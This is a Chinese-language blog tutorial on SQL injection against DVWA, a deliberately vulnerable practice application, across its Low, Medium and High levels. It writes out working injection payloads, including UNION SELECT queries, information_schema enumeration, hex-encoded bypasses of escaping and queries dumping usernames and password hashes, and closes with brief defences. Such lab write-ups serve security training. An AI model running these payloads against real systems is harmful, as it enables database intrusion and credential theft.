DVWA 之 SQL Injection-SQL注入
七、SQL Injection-SQL注入#
原理#
SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到恶意执行SQL语句的目的。
手工注入常规思路
- 判断是否存在注入,注入是字符型还是数字型
- 猜解SQL查询语句中的字段数
- 确定回显位置
- 获取当前数据库
- 获取数据库中的表
- 获取表中的字段
- 得到数据
1. Low#
漏洞利用
现实攻击场景下,攻击者是无法看到后端代码的,所以下面的手工注入步骤是建立在无法看到源码的基础上。
1.判断是否存在注入,注入是字符型还是数字型
输入1
,查询成功
输入1'
,返回SQL语法错误
输入1' or '2'='2
,查询成功
表明存在字符型注入
2.猜解SQL查询语句中的字段数
输入1′ order by 1 #
,查询成功:
输入1′ order by 2 #
,查询成功:
输入1′ order by 3 #
,查询失败:
说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname
3.确定显示的位置
输入1′ union select 1,2 #
,查询成功:
4.获取当前数据库
输入1' union select version(),database() #
,查询成功:
说明当前的数据库为dvwa
5.获取数据库中的表
1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#
若出现Illegal mix of collations for operation 'UNION'
错误,原因是是union两端的字段的collatie(排序规则)不同,可以下载phpmydamin,解压缩后放到phpstudy/www目录下,在浏览器地址栏输入localhost/phpmyadmin,进入主界面,选择dvwa数据库,在操作栏修改排序规则为utf8_genera_ci
即可。
说明数据库dvwa中一共有两个表,guestbook与users。
6.获取表中的字段名
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login
7.获取数据
输入1' union select 1,group_concat(user,0x3a,password) from users #
,查询成功:
这样就得到了users表中所有用户的user、password的数据
2. Medium#
Medium级别的代码利用mysql_real_escape_string函数对特殊符号进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。
漏洞利用
虽然在前端使用了下拉选择菜单,但我们依然可以通过抓包构造请求,提交恶意构造的查询参数。利用Burp修改数据包,绕过防御。
通过Burp抓包发送到Repeater模块,修改id参数的值
查询当前数据库
1 union select version(),database()#
数据库为dvwa
获取数据库中的表
1 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#
说明数据库dvwa中一共有两个表,guestbook与users。
获取表中的字段名,考虑到单引号被转义,可以利用16进制绕过。('user')
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #
获得字段中的数据
1 union select user, password from users#
可以得到users表中所有用户的user、password的数据
3. High#
High级别的代码只是在SQL查询语句中添加了LIMIT 1,以此控制只输出一个结果
漏洞利用
虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。由于手工注入的过程与Low级别基本一样,直接演示最后一步查询数据。
输入1' union select 1,group_concat(user,0x3a,password) from users #
需要特别提到的是,High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。
防护方法#
- 使用预编译语句,绑定变量
- 使用存储过程
- 检查数据类型
- 使用安全函数
作者:augustine0654
出处:https://www.cnblogs.com/augustine0654/p/17179712.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)